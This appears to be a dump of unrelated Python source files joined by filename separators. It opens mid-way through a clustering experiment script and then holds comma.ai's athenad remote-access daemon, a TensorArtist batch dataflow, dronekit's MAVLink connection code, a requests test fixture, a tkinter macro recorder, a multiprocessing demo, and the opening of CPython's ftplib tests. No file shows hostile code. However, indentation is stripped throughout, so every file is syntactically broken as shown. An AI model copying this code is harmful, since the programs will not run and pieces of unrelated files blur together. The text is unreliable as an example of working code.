clusters = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 20, 50, 88] # eight for num speakers, eleven for num vowels
orig = add
for num_c in clusters:
add = orig + "nc" + str(num_c)
errs = []
checker = KM(n_clusters=num_c)
checker.fit(ry)
truth = checker.predict(ry)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
clf = KM(n_clusters=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
for index, val in enumerate(result):
clusters[val].append(index)
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "KMeans clustering error", "KM"+add)
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onKM"+add)
print "km done" + add
def nn(tx, ty, rx, ry, add="", iterations=4001):
"""
trains and plots a neural network on the data we have
"""
print "nn" + add
resultst = []
resultsr = []
iter_arr = np.arange(iterations, step=500)
iter_arr[0] = 1
# queue = mp.Queue()
# processes = []
# processes = [mp.Process(target=_nn, args=[tx, ty, rx, ry, i_num]) for i_num in iter_arr]
# for p in processes:
# p.start()
# for p in processes:
# p.join()
# results = []
# for _ in processes:
# results.append(queue.get());
# for result in sorted(results, key=lambda x: x[0]):
# print result
# i_num, train_score, test_score = result
# resultst.append(train_score)
# resultsr.append(test_score)
for i_num in iter_arr:
result = _nn(tx, ty, rx, ry, i_num)
print result
resultst.append(1. - result[1])
resultsr.append(1. - result[2])
plot([0, iterations, 0, 1], (iter_arr, resultst, "ro", iter_arr, resultsr, "bo"), "Network Epoch", "Percent Error", "Neural Network Error", "NN"+add)
print "nn done" + add
def _nn(tx, ty, rx, ry, n_iter):
print "_nn"
nn = Classifier(
layers=[
Layer("Tanh", units=100),
Layer("Softmax")],
n_iter=n_iter)
nn.fit(tx, ty)
resultst = nn.score(tx, ty)
resultsr = nn.score(rx, ry)
print "_nn done"
return n_iter, resultst, resultsr
if __name__=="__main__":
train_x, train_y, test_x, test_y = util.load_vowel()
# em(train_x, train_y, test_x, test_y)
# km(train_x, train_y, test_x, test_y)
# pca(train_x, train_y, test_x, test_y)
# ica(train_x, train_y, test_x, test_y)
# randproj(train_x, train_y, test_x, test_y)
kbest(train_x, train_y, test_x, test_y)
# nn(train_x, train_y, test_x, test_y)
|
athenad.py
|
#!/usr/bin/env python3.7
import json
import os
import hashlib
import io
import random
import select
import socket
import time
import threading
import base64
import requests
import queue
from collections import namedtuple
from functools import partial
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import create_connection, WebSocketTimeoutException, ABNF
from selfdrive.loggerd.config import ROOT
import cereal.messaging as messaging
from common import android
from common.api import Api
from common.params import Params
from cereal.services import service_list
from selfdrive.swaglog import cloudlog
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', 4))
LOCAL_PORT_WHITELIST = set([8022])
dispatcher["echo"] = lambda s: s
payload_queue = queue.Queue()
response_queue = queue.Queue()
upload_queue = queue.Queue()
cancelled_uploads = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id'])
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event)),
threading.Thread(target=ws_send, args=(ws, end_event)),
threading.Thread(target=upload_handler, args=(end_event,))
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,))
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for i, thread in enumerate(threads):
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = payload_queue.get(timeout=1)
response = JSONRPCResponseManager.handle(data, dispatcher)
response_queue.put_nowait(response)
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
response_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
while not end_event.is_set():
try:
item = upload_queue.get(timeout=1)
if item.id in cancelled_uploads:
cancelled_uploads.remove(item.id)
continue
_do_upload(item)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=10)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def listDataDirectory():
files = [os.path.relpath(os.path.join(dp, f), ROOT) for dp, dn, fn in os.walk(ROOT) for f in fn]
return files
@dispatcher.add_method
def reboot():
thermal_sock = messaging.sub_sock("thermal", timeout=1000)
ret = messaging.recv_one(thermal_sock)
if ret is None or ret.thermal.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
android.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time()*1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
return [item._asdict() for item in list(upload_queue.queue)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile('/persist/comma/id_rsa.pub'):
return None
with open('/persist/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
sim_state = android.getprop("gsm.sim.state").split(",")
network_type = android.getprop("gsm.network.type").split(',')
mcc_mnc = android.getprop("gsm.sim.operator.numeric") or None
sim_id = android.parse_service_call_string(['iphonesubinfo', '11'])
cell_data_state = android.parse_service_call_unpack(['phone', '46'], ">q")
cell_data_connected = (cell_data_state == 2)
return {
'sim_id': sim_id,
'mcc_mnc': mcc_mnc,
'network_type': network_type,
'sim_state': sim_state,
'data_connected': cell_data_connected
}
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
ssock.close()
local_sock.close()
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
def ws_recv(ws, end_event):
while not end_event.is_set():
try:
data = ws.recv()
payload_queue.put_nowait(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
response = response_queue.get(timeout=1)
ws.send(response.json)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
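  # full-jitter exponential backoff: wait a random number of seconds in
  # [0, 2**retries), capped at 128 seconds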
return random.randrange(0, min(128, int(2 ** retries)))
def main(gctx=None):
params = Params()
dongle_id = params.get("DongleId").decode('utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
ws.settimeout(1)
conn_retries = 0
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
batch.py
|
# -*- coding:utf8 -*-
# File : batch.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 2/23/17
#
# This file is part of TensorArtist.
from .base import SimpleDataFlowBase
from ...core.logger import get_logger
from ...core.utils.concurrent import MTBooleanEvent
from ...core.utils.meta import iter_kv, assert_none
from copy import copy, deepcopy
from threading import Thread, Event
import traceback
logger = get_logger(__file__)
__all__ = ['BatchDataFlow', 'EpochDataFlow']
def batch_default_filler(buffer, idx, val):
for k, v in iter_kv(val):
if k in buffer:
buffer[k][idx] = v
class BatchDataFlow(SimpleDataFlowBase):
_buffer = None
_cond = None
_filler_thread = None
_stop_event = None
def __init__(self, source, batch_size, sample_dict, filler=batch_default_filler):
super().__init__()
self._source = source
self._batch_size = batch_size
self._sample_dict = sample_dict
self._filler = filler
def _initialize(self):
self._initialize_buffer()
self._initialize_filler()
def _initialize_buffer(self):
self._buffer = [deepcopy(self._sample_dict) for _ in range(2)]
def _initialize_filler(self):
self._cond = [MTBooleanEvent() for _ in range(2)]
self._stop_event = Event()
self._filler_thread = Thread(target=self._filler_mainloop, name=str(self) + ':filler', daemon=True)
self._filler_thread.start()
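    # The filler thread and the consumer ping-pong between the two buffers: while
    # _gen yields buffer `current`, the filler refills the other one, and the pair
    # of MTBooleanEvents signals when each side may proceed.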
def _filler_mainloop(self):
current = 0
it = iter(self._source)
try:
while True:
self._cond[current].wait_false()
for i in range(self._batch_size):
self._filler(self._buffer[current], i, next(it))
self._cond[current].set_true()
current = 1 - current
except Exception as e:
            logger.warning('{} got exception {} in filler thread: {}.'.format(type(self), type(e), e))
traceback.print_exc()
self._cond[current].set_true()
self._stop_event.set()
def _gen(self):
current = 0
while True:
self._cond[current].wait_true()
if self._stop_event.is_set():
return
yield self._buffer[current]
self._cond[current].set_false()
current = 1 - current
def _len(self):
length = len(self._source)
return None if length is None else length // self._batch_size
class EpochDataFlow(SimpleDataFlowBase):
def __init__(self, source, epoch_size):
self._source = source
self._source_iter = None
self._epoch_size = epoch_size
def _initialize(self):
self._source_iter = iter(self._source)
def _gen(self):
for i in range(self._epoch_size):
try:
yield next(self._source_iter)
except StopIteration:
return
def _len(self):
return self._epoch_size
|
mavlink.py
|
from __future__ import print_function
import time
import socket
import errno
import sys
import os
import platform
import re
import copy
import dronekit
from dronekit import APIException
from dronekit.util import errprinter
from pymavlink import mavutil, mavwp
from queue import Queue, Empty
from threading import Thread
import types
if platform.system() == 'Windows':
from errno import WSAECONNRESET as ECONNABORTED
else:
from errno import ECONNABORTED
class MAVWriter(object):
"""
Indirection layer to take messages written to MAVlink and send them all
on the same thread.
"""
def __init__(self, queue):
self.queue = queue
def write(self, pkt):
self.queue.put(pkt)
def read(self):
errprinter('writer should not have had a read request')
os._exit(43)
class mavudpin_multi(mavutil.mavfile):
'''a UDP mavlink socket'''
def __init__(self, device, baud=None, input=True, broadcast=False, source_system=255, use_native=mavutil.default_native):
a = device.split(':')
if len(a) != 2:
print("UDP ports must be specified as host:port")
sys.exit(1)
self.port = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.udp_server = input
self.broadcast = False
self.addresses = set()
if input:
self.port.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.port.bind((a[0], int(a[1])))
else:
self.destination_addr = (a[0], int(a[1]))
if broadcast:
self.port.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.broadcast = True
mavutil.set_close_on_exec(self.port.fileno())
self.port.setblocking(0)
mavutil.mavfile.__init__(self, self.port.fileno(), device, source_system=source_system, input=input, use_native=use_native)
def close(self):
self.port.close()
def recv(self,n=None):
try:
try:
data, new_addr = self.port.recvfrom(65535)
except socket.error as e:
if e.errno in [ errno.EAGAIN, errno.EWOULDBLOCK, errno.ECONNREFUSED ]:
return ""
if self.udp_server:
self.addresses.add(new_addr)
elif self.broadcast:
self.addresses = set([new_addr])
return data
except Exception as e:
print(e)
def write(self, buf):
try:
try:
if self.udp_server:
for addr in self.addresses:
self.port.sendto(buf, addr)
else:
if len(self.addresses) and self.broadcast:
                        # self.addresses is a set, so take an arbitrary element
                        self.destination_addr = next(iter(self.addresses))
self.broadcast = False
self.port.connect(self.destination_addr)
self.port.sendto(buf, self.destination_addr)
except socket.error:
pass
except Exception as e:
print(e)
def recv_msg(self):
'''message receive routine for UDP link'''
self.pre_message()
s = self.recv()
if len(s) > 0:
if self.first_byte:
self.auto_mavlink_version(s)
m = self.mav.parse_char(s)
if m is not None:
self.post_message(m)
return m
class MAVConnection(object):
def stop_threads(self):
if self.mavlink_thread_in is not None:
self.mavlink_thread_in.join()
self.mavlink_thread_in = None
if self.mavlink_thread_out is not None:
self.mavlink_thread_out.join()
self.mavlink_thread_out = None
def __init__(self, ip, baud=115200, target_system=0, source_system=255, use_native=False):
if ip.startswith("udpin:"):
self.master = mavudpin_multi(ip[6:], input=True, baud=baud, source_system=source_system)
else:
self.master = mavutil.mavlink_connection(ip, baud=baud, source_system=source_system)
# TODO get rid of "master" object as exposed,
# keep it private, expose something smaller for dronekit
self.out_queue = Queue()
self.master.mav = mavutil.mavlink.MAVLink(
MAVWriter(self.out_queue),
srcSystem=self.master.source_system,
use_native=use_native)
# Monkey-patch MAVLink object for fix_targets.
sendfn = self.master.mav.send
def newsendfn(mavmsg, *args, **kwargs):
self.fix_targets(mavmsg)
return sendfn(mavmsg, *args, **kwargs)
self.master.mav.send = newsendfn
# Targets
self.target_system = target_system
# Listeners.
self.loop_listeners = []
self.message_listeners = []
# Debug flag.
self._accept_input = True
self._alive = True
self._death_error = None
import atexit
def onexit():
self._alive = False
self.stop_threads()
atexit.register(onexit)
def mavlink_thread_out():
# Huge try catch in case we see http://bugs.python.org/issue1856
try:
while self._alive:
try:
msg = self.out_queue.get(True, timeout=0.01)
self.master.write(msg)
except Empty:
continue
except socket.error as error:
# If connection reset (closed), stop polling.
if error.errno == ECONNABORTED:
raise APIException('Connection aborting during send')
raise
except Exception as e:
errprinter('>>> mav send error:', e)
break
except APIException as e:
errprinter('>>> ' + str(e))
self._alive = False
self.master.close()
self._death_error = e
except Exception as e:
# http://bugs.python.org/issue1856
if not self._alive:
pass
else:
self._alive = False
self.master.close()
self._death_error = e
# Explicitly clear out buffer so .close closes.
self.out_queue = Queue()
def mavlink_thread_in():
# Huge try catch in case we see http://bugs.python.org/issue1856
try:
while self._alive:
# Downtime
time.sleep(0.05)
# Loop listeners.
for fn in self.loop_listeners:
fn(self)
while self._accept_input:
try:
msg = self.master.recv_msg()
except socket.error as error:
# If connection reset (closed), stop polling.
if error.errno == ECONNABORTED:
raise APIException('Connection aborting during read')
raise
except Exception as e:
# TODO this should be more rigorous. How to avoid
# invalid MAVLink prefix '73'
# invalid MAVLink prefix '13'
# errprinter('mav recv error:', e)
msg = None
if not msg:
break
# Message listeners.
for fn in self.message_listeners:
try:
fn(self, msg)
except Exception as e:
errprinter('>>> Exception in message handler for %s' %
msg.get_type())
errprinter('>>> ' + str(e))
except APIException as e:
errprinter('>>> ' + str(e))
self._alive = False
self.master.close()
self._death_error = e
return
except Exception as e:
# http://bugs.python.org/issue1856
if not self._alive:
pass
else:
self._alive = False
self.master.close()
self._death_error = e
t = Thread(target=mavlink_thread_in)
t.daemon = True
self.mavlink_thread_in = t
t = Thread(target=mavlink_thread_out)
t.daemon = True
self.mavlink_thread_out = t
def reset(self):
self.out_queue = Queue()
if hasattr(self.master, 'reset'):
self.master.reset()
else:
try:
self.master.close()
except:
pass
self.master = mavutil.mavlink_connection(self.master.address)
def fix_targets(self, message):
"""Set correct target IDs for our vehicle"""
if hasattr(message, 'target_system'):
message.target_system = self.target_system
def forward_loop(self, fn):
"""
Decorator for event loop.
"""
self.loop_listeners.append(fn)
def forward_message(self, fn):
"""
Decorator for message inputs.
"""
self.message_listeners.append(fn)
def start(self):
if not self.mavlink_thread_in.is_alive():
self.mavlink_thread_in.start()
if not self.mavlink_thread_out.is_alive():
self.mavlink_thread_out.start()
def close(self):
# TODO this can block forever if parameters continue to be added
self._alive = False
while not self.out_queue.empty():
time.sleep(0.1)
self.stop_threads()
self.master.close()
def pipe(self, target):
target.target_system = self.target_system
# vehicle -> self -> target
@self.forward_message
def callback(_, msg):
try:
target.out_queue.put(msg.pack(target.master.mav))
except:
try:
assert len(msg.get_msgbuf()) > 0
target.out_queue.put(msg.get_msgbuf())
except:
errprinter('>>> Could not pack this object on receive: %s' % type(msg))
# target -> self -> vehicle
@target.forward_message
def callback(_, msg):
msg = copy.copy(msg)
target.fix_targets(msg)
try:
self.out_queue.put(msg.pack(self.master.mav))
except:
try:
assert len(msg.get_msgbuf()) > 0
self.out_queue.put(msg.get_msgbuf())
except:
errprinter('>>> Could not pack this object on forward: %s' % type(msg))
return target
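# Illustrative usage sketch (not part of dronekit itself): the connection string,
# system IDs and the print handler below are assumptions for demonstration only.
if __name__ == '__main__':
    conn = MAVConnection('udpin:0.0.0.0:14550', source_system=255)

    @conn.forward_message
    def print_type(_, msg):
        # Called from the input thread for every decoded MAVLink message.
        print(msg.get_type())

    conn.start()
    time.sleep(5)
    conn.close()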
|
conftest.py
|
try:
from http.server import HTTPServer, SimpleHTTPRequestHandler
except ImportError:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import ssl
import threading
import pytest
from requests.compat import urljoin
def prepare_url(value):
# Issue #1483: Make sure the URL always has a trailing slash
httpbin_url = value.url.rstrip("/") + "/"
def inner(*suffix):
return urljoin(httpbin_url, "/".join(suffix))
return inner
@pytest.fixture
def httpbin(httpbin):
return prepare_url(httpbin)
@pytest.fixture
def httpbin_secure(httpbin_secure):
return prepare_url(httpbin_secure)
@pytest.fixture
def nosan_server(tmp_path_factory):
# delay importing until the fixture in order to make it possible
# to deselect the test via command-line when trustme is not available
import trustme
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only commonName, no subjectAltName
server_cert = ca.issue_cert(common_name="localhost")
ca_bundle = str(tmpdir / "ca.pem")
ca.cert_pem.write_to_path(ca_bundle)
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
server_cert.configure_cert(context)
server = HTTPServer(("localhost", 0), SimpleHTTPRequestHandler)
server.socket = context.wrap_socket(server.socket, server_side=True)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
yield "localhost", server.server_address[1], ca_bundle
server.shutdown()
server_thread.join()
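# Illustrative sketch (not part of the original conftest): how a test module
# would consume the httpbin fixture defined above. The "get" endpoint and the
# use of requests here are assumptions for demonstration.
def test_httpbin_root_example(httpbin):
    import requests
    response = requests.get(httpbin("get"))   # httpbin("get") -> "<base_url>/get"
    assert response.status_code == 200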
|
__init__.py
|
import tkinter as tk
from tkinter import filedialog, messagebox
from os import path
from utils import MyMouseKeyboard
import time
import threading
from functools import partial
import pyautogui as pygui
import subprocess
# subprocess.Popen is non-blocking
# subprocess.call is blocking
class Application(tk.Frame):
stoprec_exe = False
class MyButton(tk.Button):
def __init__(self, *args, **kwargs):
# tk.Button.__init__(self, *args, **kwargs)
tk.Button.__init__(self, *args, **kwargs)
class Widgets(tk.Menu):
def __init__(self, *args, **kwargs):
# tk.Button.__init__(self, *args, **kwargs)
tk.Menu.__init__(self, *args, **kwargs)
def __init__(self, master=None):
super().__init__(master)
self.master = master
menubar = self.Widgets()
menubar.add_command(label='Load File', command=lambda: self.start(self.dialog_open_arq))
menubar.add_command(label='Save As File', command=lambda: self.start(self.dialog_save_arq))
menubar.add_command(label='quit', command=master.quit)
master.config(menu=menubar)
"""
bt = self.MyButton(fg='black', bg='red')
bt["text"] = 'GRAVAR'
bt["command"] = lambda: self.start(self.gravando)
bt.pack(side="top", anchor='w', fill=tk.X)
"""
bt = self.MyButton(fg='black', bg='yellow')
bt["text"] = 'Gera Novo Arquivo'
bt["command"] = lambda: self.start(self.nova_gravacao)
bt.pack(side="top", anchor='w', fill=tk.X)
btrp = self.MyButton(fg='black', bg='green')
btrp["text"] = 'REPRODUZIR'
btrp["command"] = lambda: self.start(self.executa)
btrp.pack(side="top", anchor='w', fill=tk.X)
# threads
def refresh(self):
self.master.update()
self.master.after(1000, self.refresh)
def start(self, target):
self.refresh()
threading.Thread(target=target).start()
# #######
def mk_kboard_instance(self, select=False):
"""
:param select: if True, select the file
:return: instance of MyMouseKeyboard
"""
try:
narq = self.arq0atual
except AttributeError:
if select:
narq = self.dialog_open_arq()
else:
narq = self.mk_fld()
dale = MyMouseKeyboard(narq)
return dale
def mk_fld(self, fld=None):
self.start(self.forget_arq0)
if fld == '' or fld is None:
fld = str(time.time()).replace('.', '')
fld += f'.txt' if path.splitext(fld)[1] == '' else ''
fld_path = path.abspath(fld)
print(path.dirname(path.abspath(fld)), 'debug print for testing', fld)
self.arq0atual_label = tk.Button(text=f"Start Recording",
command=lambda: self.show_arq0(fld_path), bg='#fda321', fg='white')
self.arq0atual_label.pack()
self.arq0atual = fld
return self.arq0atual
def show_arq0(self, to_file):
fld = to_file
texto = self.arq0atual_label["text"]
try:
open(to_file).close()
subprocess.Popen(f'explorer /select,"{to_file}" ')
except FileNotFoundError:
pass
if texto == 'Start Recording':
self.arq0atual_label['bg'] = 'red'
self.arq0atual_label["text"] = 'Stop Recording'
self.start(self.gravando)
# ##################################
# SEND THE BUTTON'S COORDINATES, AND WHEN IT IS CLICKED THE THREAD WILL END
# ################################
elif texto == 'Stop Recording':
fld_resume = fld.replace(fld[3:len(fld) - int(len(fld) / 2)], '...')
self.arq0atual_label["text"] = fld_resume
self.arq0atual_label['bg'] = 'black'
self.stoprec()
def forget_arq0(self):
try:
self.arq0atual_label.pack_forget()
except (AttributeError, NameError):
pass
# WHEN THE BUTTON IS CLICKED
# -------------------------------buttons
def dialog_open_arq(self):
fld0 = filedialog.askopenfilename(defaultextension='txt', filetypes=(('text files', 'txt'), ), initialdir=path.dirname(__file__))
if fld0 == '':
return None
fld = self.mk_fld(fld0)
return fld
def dialog_save_arq(self):
fld0 = filedialog.asksaveasfilename(title="Salve a gravação", filetypes=(('text files', 'txt'), ))
fld = self.mk_fld(fld0)
return fld
def gravando(self, parou=False):
dale = self.mk_kboard_instance()
self.stoprec_exe = dale
dale.listen()
dale.backup()
def stoprec(self):
print(f'\033[1;31m STOP REC\033[m, {self.stoprec_exe}')
if self.stoprec_exe:
dale = self.stoprec_exe
self.stoprec_exe.stopit()
def executa(self):
dale = self.mk_kboard_instance(select=True)
try:
dale.playitbackup()
except FileNotFoundError:
messagebox.showinfo('ERROR', 'Generate a new file first!!!')
else:
messagebox.showinfo('DONE!!!', f'File {self.arq0atual} EXECUTED SUCCESSFULLY. [enter] to continue')
def nova_gravacao(self):
self.forget_arq0()
self.mk_fld(None)
def execute():
root = tk.Tk()
root.resizable(True, True)
rx, ry = pygui.getActiveWindow().center
root.geometry(f'250x100+{rx}+{ry}')
root.wm_iconposition(rx, ry)
app = Application(root)
app.mainloop()
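# Entry-point guard added for illustration (an assumption that this module is
# meant to be run directly rather than only imported).
if __name__ == '__main__':
    execute()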
|
run_3.py
|
#!/usr/bin/env python
from multiprocessing import Process, Queue
import time
def bad_ass_function(**kwargs):
n = int(kwargs["n"])
q = kwargs["queue"]
t = time.time
u = t() + n
while t() < u:
pass
return_str = "finished {}s of badass-ery".format(n)
q.put(return_str)
def dump_queue(q):
print("emptying queue:")
while not q.empty():
print(q.get())
print("queue is empty")
if __name__ == "__main__":
n = 3
queue = Queue()
# Process takes keyword args: target=function_name, args=function_args_tuple, kwargs=function_kwargs_dict
p1 = Process(target=bad_ass_function,kwargs={"n":n,"queue":queue})
# calls "p.run" in a new thread
#p1.start()
# block this thread until p1 terminates
#p1.join()
# create two new Process objects
#n = 5
#p2 = Process(target=bad_ass_function,kwargs={"n":n,"queue":queue})
#time.sleep(1)
#p3 = Process(target=bad_ass_function,kwargs={"n":n,"queue":queue})
#p2.start()
#p3.start()
#dump_queue(queue)
#p3.join()
#dump_queue(queue)
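# One possible way to exercise the worker defined above (an illustrative
# completion of the commented-out flow; values unchanged): start it, wait
# for it to finish, then drain the queue.
p1.start()
p1.join()
dump_queue(queue)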
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import threading
import time
import unittest
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import socket_helper
from test.support.socket_helper import HOST, HOSTv6
TIMEOUT = support.LOOPBACK_TIMEOUT
DEFAULT_ENCODING = 'utf-8'
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000 + 'non-ascii char \xAE\r\n'
LIST_DATA = 'foo\r\nbar\r\n non-ascii char \xAE\r\n'
NLST_DATA = 'foo\r\nbar\r\n non-ascii char \xAE\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n"
"type=dir;perm=cpmel;unique==SGP1; dir \xAE non-ascii char\r\n"
"type=file;perm=r;unique==SGP2; file \xAE non-ascii char\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
self.encoding = baseclass.encoding
def handle_read(self):
new_data = self.recv(1024).decode(self.encoding, 'replace')
self.baseclass.last_received_data += new_data
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode(self.encoding))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn, encoding=DEFAULT_ENCODING):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
self.encoding = encoding
# We use this as the string IPv4 address to direct the client
# to in response to a PASV command. To test security behavior.
# https://bugs.python.org/issue43285/.
self.fake_pasv_server_ip = '252.253.254.255'
def collect_incoming_data(self, data):
self.in_buffer.append(data)
